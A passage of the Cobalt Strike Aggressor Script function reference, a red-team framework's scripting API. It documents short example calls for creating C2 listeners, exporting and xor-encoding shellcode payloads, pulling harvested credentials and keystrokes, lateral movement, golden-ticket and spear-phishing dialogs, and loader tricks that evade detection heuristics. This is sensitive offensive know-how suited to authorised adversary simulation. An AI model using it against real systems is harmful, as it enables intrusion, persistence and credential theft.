REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.

bwmi

REMOVED Removed in Cobalt Strike 4.0.

call

Issue a call to the team server.

Arguments

$1 - the command name

$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.

... - one or more arguments to pass into this call.

Example

call("aggressor.ping", { warn(@_); }, "this is my value");

closeClient

Close the current Cobalt Strike team server connection.

Example
closeClient();

colorPanel

Generate a Java component to set accent colors within Cobalt Strike’s data model

Arguments

$1 - the prefix

$2 - an array of IDs to change colors for

Example

popup targets {
   menu "&Color" {
      insert_component(colorPanel("targets", $1));
   }
}

See also

&highlight

credential_add

Add a credential to the data model

Arguments

$1 - username

$2 - password

$3 - realm

$4 - source

$5 - host

Example

command falsecreds {
   for ($x = 0; $x < 100; $x++) {
      credential_add("user $+ $x", "password $+ $x");
   }
}

credentials

Returns a list of application credentials in Cobalt Strike’s data model.

Returns

An array of dictionary objects with information about each credential entry.

Example
printAll(credentials());

data_keys

List the query-able keys from Cobalt Strike’s data model

Returns

A list of keys that you may query with &data_query

Example

foreach $key (data_keys()) {
   println("\n\c4=== $key ===\n");
   println(data_query($key));
}

data_query

Queries Cobalt Strike’s data model

Arguments

$1 - the key to pull from the data model

Returns

A Sleep representation of the queried data.

Example

println(data_query("targets"));

dbutton_action

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.

Arguments

$1 - the $dialog object

$2 - the button label

Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

dbutton_help

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user’s browser to the specified URL.

Arguments

$1 - the $dialog object

$2 - the URL to go to

Example

dbutton_help($dialog, "http://www.google.com");

dialog

Create a dialog. Use &dialog_show to show it.

Arguments

$1 - the title of the dialog

$2 - a %dictionary mapping row names to default values

$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row’s name to its value.

Returns

A scalar with a $dialog object.

Example

sub callback {
   # prints: Pressed Go, a is: Apple
   println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

dialog_description

Adds a description to a &dialog

Arguments

$1 - a $dialog object

$2 - the description of this dialog

Example

dialog_description($dialog, "I am the Hello World dialog.");

dialog_show

Shows a &dialog.

Arguments

$1 - the $dialog object

Example

dialog_show($dialog);

dispatch_event

Call a function in Java Swing’s Event Dispatch Thread. Java’s Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.

Arguments

$1 - the function to call

Example

dispatch_event({
   println("Hello World"); 
});

downloads

Returns a list of downloads in Cobalt Strike’s data model.

Returns

An array of dictionary objects with information about each downloaded file.

Example

printAll(downloads());

drow_beacon

Adds a beacon selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_beacon($dialog, "bid", "Session: ");

drow_checkbox

Adds a checkbox to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - the text next to the checkbox

Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

drow_combobox

Adds a combobox to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - an array of options to choose from

Example
drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

drow_exploits

Adds a privilege escalation exploit selection row to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_exploits($dialog, "exploit", "Exploit: ");

drow_file

Adds a file chooser row to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_file($dialog, "file", "Choose: ");

drow_interface

Adds a VPN interface selection row to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_interface($dialog, "int", "Interface: ");

drow_krbtgt

Adds a krbtgt selection row to a [&dialog]

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_krbtgt($dialog, "hash", "krbtgt hash: ");

drow_listener

Adds a listener selection row to a [&dialog]. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_listener($dialog, "listener", "Listener: ");

drow_listener_smb

DEPRECATED This function is deprecated in Cobalt Strike 4.0. It’s now equivalent to [&drow_listener_stage].

drow_listener_stage

Adds a listener selection row to a [&dialog]. This row shows all Beacon and Foreign listener payloads.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_listener_stage($dialog, "listener", "Stage: ");

drow_mailserver

Adds a mail server field to a [&dialog].

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_mailserver($dialog, "mail", "SMTP Server: ");

drow_proxyserver

DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.

Adds a proxy server field to a [&dialog].

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_proxyserver($dialog, "proxy", "Proxy: ");

drow_site

Adds a site/URL field to a [&dialog].

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_site($dialog, "url", "Site: ");

drow_text

Adds a text field row to a [&dialog].

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - Optional. The width of this text field (in characters). This value isn’t always honored (it won’t shrink the field, but it will make it wider).

Example
drow_text($dialog, "name", "Name: ");

drow_text_big

Adds a multi-line text field to a [&dialog].

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example
drow_text_big($dialog, "addr", "Address: ");

dstamp

Format a time into a date/time value. This value includes seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example
println("The time is now: " . dstamp(ticks()));

See also
&tstamp

elog

Publish a notification to the event log

Arguments

$1 - the message

Example
elog("The robot invasion has begun!");

encode

Obfuscate a position-independent blob of code with an encoder.

Arguments

$1 - position independent code (e.g., shellcode, “raw” stageless Beacon) to apply encoder to

$2 - the encoder to use

$3 - the architecture (e.g., x86, x64)

Notes

• The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
• alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.

Returns

A position-independent blob that decodes the original string and passes execution to it.

Example

# generate shellcode for a listener
$stager = shellcode("my listener", false "x86");

# encode it.
$stager = encode($stager, "xor", "x86");

extract_reflective_loader

Extract the executable code for a reflective loader from a Beacon Object File (BOF).

Arguments

$1 - Beacon Object File data that contains a reflective loader.

Returns

The Reflective Loader binary executable code extracted from the Beacon Object File data.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# extract loader from BOF.
# ---------------------------------------------------------------------
$loader = extract_reflective_loader($data);

fireAlias

Runs a user-defined alias

Arguments

$1 - the beacon id to run the alias against

$2 - the alias name to run

$3 - the arguments to pass to the alias.

Example

# run the foo alias when a new Beacon comes in
on beacon_initial {
   fireAlias($1, "foo", "bar!");
}

fireEvent

Fire an event.

Arguments

$1 - the event name

... - the event arguments.

Example

on foo {
   println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

format_size

Formats a number into a size (e.g., 1024 => 1kb)

Arguments

$1 - the size to format

Returns

A string representing a human readable data size.

Example
println(format_size(1024));

getAggressorClient

Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.

Example
$client = getAggressorClient();

gunzip

Decompress a string (GZIP).

Arguments

$1 - the string to compress

Returns
The argument processed by the gzip de-compressor

Example
println(gunzip(gzip("this is a test")));

See also
[&gzip]

gzip

GZIP a string.

Arguments

$1 - the string to compress

Returns
The argument processed by the gzip compressor

Example
println(gzip("this is a test"));

See also
[&gunzip]

highlight

Insert an accent (color highlight) into Cobalt Strike’s data model

Arguments

$1 - the data model
$2 - an array of rows to highlight
$3 - the accent type

Notes

• Data model rows include: applications, beacons, credentials, listeners, services, and targets.
• Accent options are:

Example

command admincreds {
   local('@creds');
   
   # find all of our creds that are user Administrator.
   foreach $entry (credentials()) {
      if ($entry['user'] eq "Administrator") {
         push(@creds, $entry);
      }
   }
   
   # highlight all of them green!
   highlight("credentials", @creds, "good");
}

host_delete

Delete a host from the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

Example

# clear all hosts
host_delete(hosts());

host_info

Get information about a target.

Arguments

$1 - the host IPv4 or IPv6 address

$2 - [Optional] the key to extract a value for

Returns

%info = host_info(“address”);

Returns a dictionary with known information about this target.

$value = host_info(“address”, “key”);

Returns the value for the specified key from this target’s entry in the data model.

Example

# create a script console alias to dump host info
command host {
   println("Host $1");
   foreach $key => $value (host_info($1)) {
      println("$[15]key $value");
   }
}

host_update

Add or update a host in the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

$2 - the DNS name of this target

$3 - the target’s operating system

$4 - the operating system version number (e.g., 10.0)

$5 - a note for the target.

Note
You may specify a $null value for any argument and, if the host exists, no change will be made to that value.

Example
host_update("192.168.20.3", "DC", "Windows", 10.0);

hosts

Returns a list of IP addresses from Cobalt Strike’s target model

Returns

An array of IP addresses

Example

printAll(hosts());

insert_component

Add a javax.swing.JComponent object to the menu tree

Arguments

$1 - the component to add

insert_menu

Bring menus associated with a popup hook into the current menu tree.

Arguments

$1 - the popup hook

... - additional arguments are passed to the child popup hook.

Example

popup beacon {
   # menu definitions above this point
   
   insert_menu("beacon_bottom", $1);
   
   # menu definitions below this point
}

iprange

Generate an array of IPv4 addresses based on a string description

Arguments

$1 - a string with a description of IPv4 ranges

Returns

An array of IPv4 addresses within the specified ranges.

Example
printAll(iprange("192.168.1.0/25"));

keystrokes

Returns a list of keystrokes from Cobalt Strike’s data model.

Returns

An array of dictionary objects with information about recorded keystrokes.

Example
printAll(keystrokes());

licenseKey

Get the license key for this instance of Cobalt Strike

Returns

Your license key.

Example
println("Your key is: " . licenseKey());

listener_create

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use [&listener_create_ext].
Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - the listener host

$4 - the listener port

$5 - a comma separated list of addresses for listener to beacon to

Example

# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", 
      "ads.losenolove.com", 443);

# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
      "www.losenolove.com", 80, 
      "www.losenolove.com, www2.losenolove.com");

listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - a map with key/value pairs that specify options for the listener

Note
The following payload options are valid for $2 :

The following keys are valid for $3 :

The following host rotation Values are valid for the ‘strategy’ Key:

Option
round-robin
random
failover
failover-5x
failover-50x
failover-100x
failover-1m
failover-5m
failover-15m
failover-30m
failover-1h
failover-3h
failover-6h
failover-12h
failover-1d
rotate-1m
rotate-5m
rotate-15m
rotate-30m
rotate-1h
rotate-3h
rotate-6h
rotate-12h
rotate-1d

Note
The maxretry value uses the following syntax of exit-[max_attempts]-[increase_attempts]-[duration][m,h,d]. For example ‘exit-10-5-5m’ will exit beacon after 10 failed attempts and will increase sleep time after 5 failed attempts to 5 minutes. The sleep time will not be updated if the current sleep time is greater than the specified duration value. The sleep time will be affected by the current jitter value. On a successful connection the failed attempts count will be reset to zero and the sleep time will be reset to the prior value.

The proxy configuration string is the same string you would input into Cobalt Strike’s listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http . Set the proxy configuration string to $null or "" to use the default behavior.

Example

# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
      %(host => "ads.losenolove.com", port => 443));

# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
      %(host => "www.losenolove.com", port => 80, 
      beacons => "www.losenolove.com, www2.losenolove.com"));

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      max_retry => "exit-10-5-5m",
      proxy => "proxy.host"));

listener_delete

Stop and remove a listener.

Arguments

$1 - the listener name

Example

listener_delete(“Beacon HTTP”);

listener_describe

Describe a listener.

Arguments

$1 - the listener name

$2 - [Optional] the remote target the listener is destined for

Returns

A string describing the listener

Example

foreach $name (listeners()) {
   println("$name is: " . listener_describe($name));
}

listener_info

Get information about a listener.

Arguments

$1 - the listener name
$2 - [Optional] the key to extract a value for

Returns
%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.
$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener’s metadata

Example

# create a script console alias to dump listener info
command dump {
   println("Listener $1");
   foreach $key => $value (listener_info($1)) {
      println("$[15]key $value");
   }
}

listener_pivot_create

Create a new pivot listener.

Arguments

$1 - the Beacon ID
$2 - the listener name
$3 - the payload (e.g., windows/beacon_reverse_tcp)
$4 - the listener host
$5 - the listener port

Note
The only valid payload argument is windows/beacon_reverse_tcp .

Example

# create a pivot listener: 
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
   local('$lhost $bid $name $port');
   
   # extract our arguments
   ($bid, $name, $port) = @_;
   
   # get the name of our target
   $lhost = beacon_info($1, "computer");
   
   btask($1, "create TCP listener on $lhost $+ : $+ $port");
   listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

listener_restart

Restart a listener

Arguments

$1 - the listener name

Example
listener_restart("Beacon HTTP");

listeners

Return a list of listener names (with stagers only!) across all team servers this client is connected to.

Returns

An array of listener names.

Example
printAll(listeners());

listeners_local

Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.

Returns
An array of listener names.

Example
printAll(listeners_local());

listeners_stageless

Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they’re not actionable via staging or exporting as a Reflective DLL).

Returns

An array of listener names.

Example
printAll(listeners_stageless());

localip

Get the IP address associated with the team server.

Returns

A string with the team server’s IP address.

Example
println("I am: " . localip());

menubar

Add a top-level item to the menubar.

Arguments

$1 - the description

$2 - the popup hook

Example

popup mythings {
   item "Keep out" {
   }
}

menubar("My &Things", "mythings");

mynick

Get the nickname associated with the current Cobalt Strike client.

Returns

A string with your nickname.

Example
println("I am: " . mynick());

nextTab

Activate the tab that is to the right of the current tab.

Example

bind Ctrl+Right {
   nextTab();
}

on

Register an event handler. This is an alternate to the on keyword.

Arguments

$1 - the name of the event to respond to

$2 - a callback function. Called when the event happens.

Example

sub foo {
   blog($1, "Foo!");
}

on("beacon_initial", &foo);

openAboutDialog

Open the “About Cobalt Strike” dialog

Example
openAboutDialog();

openApplicationManager

Open the application manager (system profiler results) tab.

Example
openApplicationManager();

openAutoRunDialog

REMOVED Removed in Cobalt Strike 4.0.

openBeaconBrowser

Open the beacon browser tab.

Example
openBeaconBrowser();

openBeaconConsole

Open the console to interact with a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Interact" {
   local('$bid');
   foreach $bid ($1) {
      openBeaconConsole($bid);
   }
}

openBrowserPivotSetup

open the browser pivot setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browser Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openBrowserPivotSetup($bid);
   }
}

openBypassUACDialog

REMOVED Removed in Cobalt Strike 4.1.

openCloneSiteDialog

Open the dialog for the website clone tool.

Example
openCloneSiteDialog();

openConnectDialog

Open the connect dialog.

Example
openConnectDialog();

openCovertVPNSetup

open the Covert VPN setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "VPN Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openCovertVPNSetup($bid);
   }
}

openCredentialManager

Open the credential manager tab.

Example
openCredentialManager();

openDownloadBrowser

Open the download browser tab

Example

openDownloadBrowser();

openElevateDialog

Open the dialog to launch a privilege escalation exploit.

Arguments

$1 - the beacon ID

Example

item "Elevate" {
   local('$bid');
   foreach $bid ($1) {
      openElevateDialog($bid);
   }
}

openEventLog

Open the event log.

Example
openEventLog();

openFileBrowser

Open the file browser for a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browse Files" {
   local('$bid');
   foreach $bid ($1) {
      openFileBrowser($bid);
   }
}

openGoldenTicketDialog

open a dialog to help generate a golden ticket

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Golden Ticket" {
   local('$bid');
   foreach $bid ($1) {
      openGoldenTicketDialog($bid);
   }
}

openHTMLApplicationDialog

Open the HTML Application Dialog.

Example
openHTMLApplicationDialog();

openHostFileDialog

Open the host file dialog.

Example
openHostFileDialog();

openInterfaceManager

Open the tab to manage Covert VPN interfaces

Example
openInterfaceManager();

openJavaSignedAppletDialog

Open the Java Signed Applet dialog

Example
openJavaSignedAppletDialog();

openJavaSmartAppletDialog

Open the Java Smart Applet dialog

Example
openJavaSmartAppletDialog();

openJumpDialog

Open Cobalt Strike’s lateral movement dialog

Arguments

$1 - the type of lateral movement. See more &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.

$2 - an array of targets to apply this action against

Example
openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

openKeystrokeBrowser

Open the keystroke browser tab

Example
openKeystrokeBrowser();

openListenerManager

Open the listener manager

Example
openListenerManager();

openMakeTokenDialog

open a dialog to help generate an access token

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Make Token" {
   local('$bid');
   foreach $bid ($1) {
      openMakeTokenDialog($bid);
   }
}

openMalleableProfileDialog

Open the malleable C2 profile dialog.

Example
openMalleableProfileDialog();

openOfficeMacro

Open the office macro export dialog

Example
openOfficeMacroDialog();

openOneLinerDialog

Open the dialog to generate a PowerShell one-liner for this specific Beacon session.

Arguments

$1 - the beacon ID

Example

item "&One-liner" {
   openOneLinerDialog($1);
}

openOrActivate

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.

Arguments

$1 - the Beacon ID

Example

item "&Activate" {
   local('$bid');
   foreach $bid ($1) {
      openOrActivate($bid);
   }
}

openPayloadGeneratorDialog

Open the Payload Generator dialog.

Example
openPayloadGeneratorDialog();

openPayloadHelper

Open a payload chooser dialog.

Arguments
$1 - a callback function. Arguments: $1 - the selected listener.

Example

openPayloadHelper(lambda({
   bspawn($bid, $1);
}, $bid => $1));

openPivotListenerSetup

open the pivot listener setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Listener..." {
   local('$bid');
   foreach $bid ($1) {
      openPivotListenerSetup($bid);
   }
}

openPortScanner

Open the port scanner dialog

Arguments

$1 - an array of targets to scan

Example
openPortScanner(@("192.168.1.3"));

openPortScannerLocal

Open the port scanner dialog with options to target a Beacon’s local network

Arguments

$1 - the beacon to target with this feature

Example

item "Scan" {
   local('$bid');
   foreach $bid ($1) {
      openPortScannerLocal($bid);
   }
}

openPowerShellWebDialog

Open the dialog to setup the PowerShell Web Delivery Attack

Example

openPowerShellWebDialog();

openPreferencesDialog

Open the preferences dialog

Example
openPreferencesDialog();

openProcessBrowser

Open a process browser for one or more Beacons

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Processes" {
   openProcessBrowser($1);
}

openSOCKSBrowser

Open the tab to list SOCKS proxy servers

Example
openSOCKSBrowser();

openSOCKSSetup

open the SOCKS proxy server setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "SOCKS Server" {
   local('$bid');
   foreach $bid ($1) {
      openSOCKSSetup($bid);
   }
}

openScreenshotBrowser

Open the screenshot browser tab

Example
openScreenshotBrowser();

openScriptConsole

Open the Aggressor Script console.

Example
openScriptConsole();

openScriptManager

Open the tab for the script manager.

Example
openScriptManager();

openScriptedWebDialog

Open the dialog to setup a Scripted Web Delivery Attack

Example
openScriptedWebDialog();

openServiceBrowser

Open service browser dialog

Arguments
$1 - an array of targets to show services for

Example
openServiceBrowser(@("192.168.1.3"));

openSiteManager

Open the site manager.

Example
openSiteManager();

openSpawnAsDialog

Open dialog to spawn a payload as another user

Arguments
$1 - the Beacon ID to apply this feature to

Example

item "Spawn As..." {
   local('$bid');
   foreach $bid ($1) {
      openSpawnAsDialog($bid);
   }
}

openSpearPhishDialog

Open the dialog for the spear phishing tool.

Example
openSpearPhishDialog();

openSystemInformationDialog

Open the system information dialog.

Example
openSystemInformationDialog();

openSystemProfilerDialog

Open the dialog to setup the system profiler.

Example

openSystemProfilerDialog();

openTargetBrowser

Open the targets browser

Example
openTargetBrowser();

openWebLog

Open the web log tab.

Example

openWebLog();

openWindowsDropperDialog

REMOVED Removed in Cobalt Strike 4.0.

openWindowsExecutableDialog

Open the dialog to generate a Windows executable

Example
openWindowsExecutableDialog();

openWindowsExecutableStage

Open the dialog to generate a stageless Windows executable

Example
openWindowsExecutableStage();

payload

Exports a raw payload for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - x86|x64 the architecture of the payload

$3 - exit method: ‘thread’ (leave the thread when done) or ‘process’ (exit the process when done). Use ‘thread’ if injecting into an existing process.

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload("my listener", "x86", "process");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

payload_bootstrap_hint

Get the offset to function pointer hints used by Beacon’s Reflective Loader. Populate these hints with the asked-for process addresses to have Beacon load itself into memory in a more OPSEC-safe way.

Arguments

$1 - the payload position-independent code (specifically, Beacon)

$2 - the function to get the patch location for

Notes

• Cobalt Strike’s Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon’s Reflective Loader. The protocol is to patch the location of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32’s Export Address Table. This protocol is optional. Artifacts that don’t follow this protocol will fallback to resolving key functions via the Export Address Table.
• The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.

Returns

The offset to a memory location to patch with a pointer for a specific function used by Beacon’s Reflective Loader.

Continue Reading User Guide - Part 4 (Functions 3-3)